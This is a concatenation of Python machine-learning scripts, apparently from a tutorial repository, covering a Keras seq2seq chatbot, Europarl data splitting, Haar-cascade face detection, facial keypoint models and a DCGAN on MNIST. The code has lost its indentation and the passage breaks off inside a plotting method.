from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
# return ''.join([index_to_words[np.where(prediction==1)[0]] for prediction in logits])
text = ""
for prediction in logits:
char_index = np.where(prediction)[0][0]
char = index_to_words[char_index]
text += char
return text
num_encoder_tokens = 61
num_decoder_tokens = 61
latent_dim = 384
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_layer=False)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = to_categorical(pad(tokenized, length=37), num_classes=num_encoder_tokens)
# print(X)
sequence = predict_sequence(enc, dec, X, 206, num_decoder_tokens, char_level=True)
# print(sequence)
result = logits_to_text(sequence)
print(result)
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=32,
same_tokenizer=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
embedding_vectors = get_embedding_vectors(tokenizer)
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 300
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_matrix=embedding_vectors)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer="rmsprop", loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_v13_{val_loss:.3f}_{val_acc:.3f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_v13_4.806_0.219.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size),
validation_steps=(len(text_gen.X_test) // text_gen.batch_size),
callbacks=[checkpointer],
epochs=5)
print("[+] Model trained.")
model.save_weights("results/chatbot_v13.h5")
print("[+] Model saved.")
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=256,
same_tokenizer=True,
char_level=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 384
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_layer=False)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer=AdaBound(lr=1e-3, final_lr=0.1), loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_charlevel_v2_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size)+1,
validation_steps=(len(text_gen.X_test) // text_gen.batch_size)+1,
callbacks=[checkpointer],
epochs=50)
print("[+] Model trained.")
model.save_weights("results/chatbot_charlevel_v2.h5")
print("[+] Model saved.")
import tqdm
X, y = [], []
with open("data/fr-en", encoding='utf8') as f:
for i, line in tqdm.tqdm(enumerate(f), "Reading file"):
if "europarl-v7" in line:
continue
# X.append(line)
# if i == 2007723 or i == 2007724 or i == 2007725
if i <= 2007722:
X.append(line.strip())
else:
y.append(line.strip())
y.pop(-1)
with open("data/en", "w", encoding='utf8') as f:
for i in tqdm.tqdm(X, "Writing english"):
print(i, file=f)
with open("data/fr", "w", encoding='utf8') as f:
for i in tqdm.tqdm(y, "Writing french"):
print(i, file=f)
import glob
import tqdm
import os
import random
import inflect
p = inflect.engine()
X, y = [], []
special_words = {
"haha", "rockikz", "fullclip", "xanthoss", "aw", "wow", "ah", "oh", "god", "quran", "allah",
"muslims", "muslim", "islam", "?", ".", ",",
'_func_val_get_callme_para1_comma0', '_num2_', '_func_val_get_last_question', '_num1_',
'_func_val_get_number_plus_para1__num1__para2__num2_',
'_func_val_update_call_me_enforced_para1__callme_',
'_func_val_get_number_minus_para1__num2__para2__num1_', '_func_val_get_weekday_para1_d0',
'_func_val_update_user_name_para1__name_', '_callme_', '_func_val_execute_pending_action_and_reply_para1_no',
'_func_val_clear_user_name_and_call_me', '_func_val_get_story_name_para1_the_velveteen_rabbit', '_ignored_',
'_func_val_get_number_divide_para1__num1__para2__num2_', '_func_val_get_joke_anyQ:',
'_func_val_update_user_name_and_call_me_para1__name__para2__callme_', '_func_val_get_number_divide_para1__num2__para2__num1_Q:',
'_name_', '_func_val_ask_name_if_not_yet', '_func_val_get_last_answer', '_func_val_continue_last_topic',
'_func_val_get_weekday_para1_d1', '_func_val_get_number_minus_para1__num1__para2__num2_', '_func_val_get_joke_any',
'_func_val_get_story_name_para1_the_three_little_pigs', '_func_val_update_call_me_para1__callme_',
'_func_val_get_story_name_para1_snow_white', '_func_val_get_today', '_func_val_get_number_multiply_para1__num1__para2__num2_',
'_func_val_update_user_name_enforced_para1__name_', '_func_val_get_weekday_para1_d_2', '_func_val_correct_user_name_para1__name_',
'_func_val_get_time', '_func_val_get_number_divide_para1__num2__para2__num1_', '_func_val_get_story_any',
'_func_val_execute_pending_action_and_reply_para1_yes', '_func_val_get_weekday_para1_d_1', '_func_val_get_weekday_para1_d2'
}
english_words = { word.strip() for word in open("data/words8.txt") }
embedding_words = set()
f = open("data/glove.6B.300d.txt", encoding='utf8')
for line in tqdm.tqdm(f, "Reading GloVe words"):
values = line.split()
word = values[0]
embedding_words.add(word)
maps = open("data/maps.txt").readlines()
word_mapper = {}
for map in maps:
key, value = map.split("=>")
key = key.strip()
value = value.strip()
print(f"Mapping {key} to {value}")
word_mapper[key.lower()] = value
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
def map_text(line):
global unks
global digits
global mapped
global english
global special
result = []
append = result.append
words = line.split()
for word in words:
word = word.lower()
if word.isdigit():
append(p.number_to_words(word))
digits += 1
continue
if word in word_mapper:
append(word_mapper[word])
mapped += 1
continue
if word in english_words:
append(word)
english += 1
continue
if word in special_words:
append(word)
special += 1
continue
append("_unk_")
unks += 1
return ' '.join(result)
for file in tqdm.tqdm(glob.glob("data/Augment*/*"), "Reading files"):
with open(file, encoding='utf8') as f:
for line in f:
line = line.strip()
if "Q: " in line:
X.append(line)
elif "A: " in line:
y.append(line)
# shuffle X and y maintaining the order
combined = list(zip(X, y))
random.shuffle(combined)
X[:], y[:] = zip(*combined)
with open("data/questions", "w") as f:
for line in tqdm.tqdm(X, "Writing questions"):
line = line.strip().lstrip('Q: ')
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
with open("data/answers", "w") as f:
for line in tqdm.tqdm(y, "Writing answers"):
line = line.strip().lstrip('A: ')
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
import numpy as np
import cv2
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import numpy as np
import cv2
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
while True:
# read the image from the cam
_, image = cap.read()
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
cv2.imshow("image", image)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
from models import create_model
from parameters import *
from utils import normalize_image
def untransform(keypoints):
return keypoints * 50 + 100
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
image = cv2.imread(sys.argv[1])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# # construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1.h5")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
# get all the faces in the image
faces = face_cascade.detectMultiScale(image, 1.2, 2)
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (255, 0, 0), 3)
face_image = image.copy()[y: y+h, x: x+w]
face_image = normalize_image(face_image)
keypoints = get_single_prediction(model, face_image)
show_keypoints(face_image, keypoints)
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import cv2
from models import create_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data, resize_image, normalize_keypoints, normalize_image
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def show_keypoints_cv2(image, predicted_keypoints, true_keypoints=None):
for keypoint in predicted_keypoints:
image = cv2.circle(image, (keypoint[0], keypoint[1]), 2, color=2)
if true_keypoints is not None:
image = cv2.circle(image, (true_keypoints[:, 0], true_keypoints[:, 1]), 2, color="green")
return image
def untransform(keypoints):
return keypoints * 224
# construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_different-scaling.h5")
# X_test, y_test = load_data(testing_file)
# y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
# make a copy of the original image
image = frame.copy()
image = normalize_image(image)
keypoints = get_single_prediction(model, image)
print(keypoints[0])
keypoints = untransform(keypoints)
# w, h = frame.shape[:2]
# keypoints = (keypoints * [frame.shape[0] / image.shape[0], frame.shape[1] / image.shape[1]]).astype("int16")
# frame = show_keypoints_cv2(frame, keypoints)
image = show_keypoints_cv2(image, keypoints)
cv2.imshow("frame", image)
if cv2.waitKey(1) == ord("q"):
break
cv2.destroyAllWindows()
cap.release()
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.applications import MobileNetV2
import tensorflow as tf
import tensorflow.keras.backend as K
def smoothL1(y_true, y_pred):
HUBER_DELTA = 0.5
x = K.abs(y_true - y_pred)
x = K.switch(x < HUBER_DELTA, 0.5 * x ** 2, HUBER_DELTA * (x - 0.5 * HUBER_DELTA))
return K.sum(x)
def create_model(input_shape, output_shape):
# building the model
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same", input_shape=input_shape))
model.add(Activation("relu"))
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(MaxPooling2D(pool_size=(2, 2)))
# # model.add(Dropout(0.25))
# flattening the convolutions
model.add(Flatten())
# fully-connected layers
model.add(Dense(256))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(output_shape, activation="linear"))
# print the summary of the model architecture
model.summary()
# training the model using rmsprop optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
def create_mobilenet_model(input_shape, output_shape):
model = MobileNetV2(input_shape=input_shape)
# remove the last layer
model.layers.pop()
# freeze all the weights of the model except for the last 4 layers
for layer in model.layers[:-4]:
layer.trainable = False
# construct our output dense layer
output = Dense(output_shape, activation="linear")
# connect it to the model
output = output(model.layers[-1].output)
model = Model(inputs=model.inputs, outputs=output)
model.summary()
# training the model using adam optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
IMAGE_SIZE = (224, 224)
OUTPUT_SHAPE = (68, 2)
BATCH_SIZE = 20
EPOCHS = 30
training_file = "data/training_frames_keypoints.csv"
testing_file = "data/test_frames_keypoints.csv"
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints):
predicted_keypoints = untransform(predicted_keypoints)
true_keypoints = untransform(true_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def untransform(keypoints):
return keypoints *224
# # construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_mobilenet_crop.h5")
X_test, y_test = load_data(testing_file)
y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
y_pred = get_predictions(model, X_test)
print(y_pred[0])
print(y_pred.shape)
print(y_test.shape)
print(X_test.shape)
for i in range(50):
show_keypoints(X_test[i+400], y_pred[i+400], y_test[i+400])
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
from tqdm import tqdm
# from tensorflow.keras.layers import Conv2D, Dense, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard, ModelCheckpoint
import os
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
# # read the training dataframe
# training_df = pd.read_csv("data/training_frames_keypoints.csv")
# # print the number of images available in the training dataset
# print("Number of images in training set:", training_df.shape[0])
def show_keypoints(image, key_points):
# show the image
plt.imshow(image)
# use scatter() to plot the keypoints in the faces
plt.scatter(key_points[:, 0], key_points[:, 1], s=20, marker=".")
plt.show()
# show an example image
# n = 124
# image_name = training_df.iloc[n, 0]
# keypoints = training_df.iloc[n, 1:].values.reshape(-1, 2)
# show_keypoints(mpimg.imread(os.path.join("data", "training", image_name)), key_points=keypoints)
model_name = "model_smoothl1_mobilenet_crop"
# construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
# model.load_weights("results/model3.h5")
X_train, y_train = load_data(training_file, to_gray=False)
X_test, y_test = load_data(testing_file, to_gray=False)
if not os.path.isdir("results"):
os.mkdir("results")
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
# checkpoint = ModelCheckpoint(os.path.join("results", model_name), save_best_only=True, verbose=1)
history = model.fit(X_train, y_train,
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(X_test, y_test),
# callbacks=[tensorboard, checkpoint],
callbacks=[tensorboard],
verbose=1)
model.save("results/" + model_name + ".h5")
import numpy as np
import pandas as pd
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import cv2
from tqdm import tqdm
import os
from parameters import IMAGE_SIZE, OUTPUT_SHAPE
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
# predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
# true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def resize_image(image, image_size):
return cv2.resize(image, image_size)
def random_crop(image, keypoints):
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
keypoints = keypoints.reshape(-1, 2)
try:
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
except ValueError:
return image, keypoints
image = image[top: top + new_h, left: left + new_w]
keypoints = keypoints - [left, top]
return image, keypoints
def normalize_image(image, to_gray=True):
if image.shape[2] == 4:
# if the image has an alpha color channel (opacity)
# let's just remove it
image = image[:, :, :3]
# get the height & width of image
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
# scaling the image to that IMAGE_SIZE
# image = cv2.resize(image, (new_w, new_h))
image = resize_image(image, (new_w, new_h))
if to_gray:
# convert image to grayscale
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# normalizing pixels from the range [0, 255] to [0, 1]
image = image / 255.0
if to_gray:
image = np.expand_dims(image, axis=2)
return image
def normalize_keypoints(image, keypoints):
# get the height & width of image
h, w = image.shape[:2]
# reshape to coordinates (x, y)
# i.e converting a vector of (136,) to the 2D array (68, 2)
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
keypoints = keypoints.reshape(-1, 2)
# scale the keypoints also
keypoints = keypoints * [new_w / w, new_h / h]
keypoints = keypoints.reshape(-1)
# normalizing keypoints from [0, IMAGE_SIZE] to [0, 1] (experimental)
keypoints = keypoints / 224
# keypoints = (keypoints - 100) / 50
return keypoints
def normalize(image, keypoints, to_gray=True):
image, keypoints = random_crop(image, keypoints)
return normalize_image(image, to_gray=to_gray), normalize_keypoints(image, keypoints)
def load_data(csv_file, to_gray=True):
# read the training dataframe
df = pd.read_csv(csv_file)
all_keypoints = np.array(df.iloc[:, 1:])
image_names = list(df.iloc[:, 0])
# load images
X, y = [], []
X = np.zeros((len(image_names), *IMAGE_SIZE, 3), dtype="float32")
y = np.zeros((len(image_names), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1]))
for i, (image_name, keypoints) in enumerate(zip(tqdm(image_names, "Loading " + os.path.basename(csv_file)), all_keypoints)):
image = mpimg.imread(os.path.join("data", "training", image_name))
image, keypoints = normalize(image, keypoints, to_gray=to_gray)
X[i] = image
y[i] = keypoints
return X, y
"""
DCGAN on MNIST using Keras
"""
# to use CPU
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import numpy as np
import matplotlib.pyplot as plt
import tqdm
import glob
# from tensorflow.examples.tutorials.mnist import input_data
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, Reshape
from keras.layers import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers import LeakyReLU, Dropout, BatchNormalization
from keras.optimizers import Adam, RMSprop
from keras.datasets import mnist
class GAN:
def __init__(self, img_x=28, img_y=28, img_z=1):
self.img_x = img_x
self.img_y = img_y
self.img_z = img_z
self.D = None # discriminator
self.G = None # generator
self.AM = None # adversarial model
self.DM = None # discriminator model
def discriminator(self):
if self.D:
return self.D
self.D = Sequential()
depth = 64
dropout = 0.4
input_shape = (self.img_x, self.img_y, self.img_z)
self.D.add(Conv2D(depth, 5, strides=2, input_shape=input_shape, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*2, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*4, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*8, 5, strides=1, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
# convert to 1 dimension
self.D.add(Flatten())
self.D.add(Dense(1, activation="sigmoid"))
print("="*50, "Discriminator", "="*50)
self.D.summary()
return self.D
def generator(self):
if self.G:
return self.G
self.G = Sequential()
dropout = 0.4
# covnerting from 100 vector noise to dim x dim x depth
# (100,) to (7, 7, 256)
depth = 64 * 4
dim = 7
self.G.add(Dense(dim*dim*depth, input_dim=100))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Reshape((dim, dim, depth)))
self.G.add(Dropout(dropout))
# upsampling to (14, 14, 128)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 2, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# up to (28, 28, 64)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 4, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 32)
self.G.add(Conv2DTranspose(depth // 8, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 1) (img)
self.G.add(Conv2DTranspose(1, 5, padding="same"))
self.G.add(Activation("sigmoid"))
print("="*50, "Generator", "="*50)
self.G.summary()
return self.G
def discriminator_model(self):
if self.DM:
return self.DM
# optimizer = RMSprop(lr=0.001, decay=6e-8)
optimizer = Adam(0.0002, 0.5)
self.DM = Sequential()
self.DM.add(self.discriminator())
self.DM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.DM
def adversarial_model(self):
if self.AM:
return self.AM
# optimizer = RMSprop(lr=0.001, decay=3e-8)
optimizer = Adam(0.0002, 0.5)
self.AM = Sequential()
self.AM.add(self.generator())
self.AM.add(self.discriminator())
self.AM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.AM
class MNIST:
def __init__(self):
self.img_x = 28
self.img_y = 28
self.img_z = 1
self.steps = 0
self.load_data()
self.create_models()
# used image indices
self._used_indices = set()
def load_data(self):
(self.X_train, self.y_train), (self.X_test, self.y_test) = mnist.load_data()
# reshape to (num_samples, 28, 28 , 1)
self.X_train = np.expand_dims(self.X_train, axis=-1)
self.X_test = np.expand_dims(self.X_test, axis=-1)
def create_models(self):
self.GAN = GAN()
self.discriminator = self.GAN.discriminator_model()
self.adversarial = self.GAN.adversarial_model()
self.generator = self.GAN.generator()
discriminators = glob.glob("discriminator_*.h5")
generators = glob.glob("generator_*.h5")
adversarial = glob.glob("adversarial_*.h5")
if len(discriminators) != 0:
print("[+] Found a discriminator ! Loading weights ...")
self.discriminator.load_weights(discriminators[0])
if len(generators) != 0:
print("[+] Found a generator ! Loading weights ...")
self.generator.load_weights(generators[0])
if len(adversarial) != 0:
print("[+] Found an adversarial model ! Loading weights ...")
self.steps = int(adversarial[0].replace("adversarial_", "").replace(".h5", ""))
self.adversarial.load_weights(adversarial[0])
def get_unique_random(self, batch_size=256):
indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# while in_used_indices:
# indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# self._used_indices |= set(indices)
# if len(self._used_indices) > self.X_train.shape[0] // 2:
# if used indices is more than half of training samples, clear it
# that is to enforce it to train at least more than half of the dataset uniquely
# self._used_indices.clear()
return indices
def train(self, train_steps=2000, batch_size=256, save_interval=0):
noise_input = None
steps = tqdm.tqdm(list(range(self.steps, train_steps)))
fake = np.zeros((batch_size, 1))
real = np.ones((batch_size, 1))
for i in steps:
real_images = self.X_train[self.get_unique_random(batch_size)]
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
noise = np.random.normal(size=(batch_size, 100))
fake_images = self.generator.predict(noise)
# get 256 real images and 256 fake images
d_loss_real = self.discriminator.train_on_batch(real_images, real)
d_loss_fake = self.discriminator.train_on_batch(fake_images, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# X = np.concatenate((real_images, fake_images))
# y = np.zeros((2*batch_size, 1))
# 0 for fake and 1 for real
# y[:batch_size, :] = 1
# shuffle
# shuffle_in_unison(X, y)
# d_loss = self.discriminator.train_on_batch(X, y)
# y = np.ones((batch_size, 1))
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
# fool the adversarial, telling him everything is real
a_loss = self.adversarial.train_on_batch(noise, real)
log_msg = f"[D loss: {d_loss[0]:.6f}, D acc: {d_loss[1]:.6f} | A loss: {a_loss[0]:.6f}, A acc: {a_loss[1]:.6f}]"
steps.set_description(log_msg)
if save_interval > 0:
noise_input = np.random.uniform(low=-1, high=1.0, size=(16, 100))
if (i + 1) % save_interval == 0:
self.plot_images(save2file=True, samples=noise_input.shape[0], noise=noise_input, step=(i+1))
self.discriminator.save(f"discriminator_{i+1}.h5")
self.generator.save(f"generator_{i+1}.h5")
self.adversarial.save(f"adversarial_{i+1}.h5")
def plot_images(self, save2file=False, fake=True, samples=16, noise=None, step=0):
filename = "mnist_fake.png"
if fake:
if noise is None:
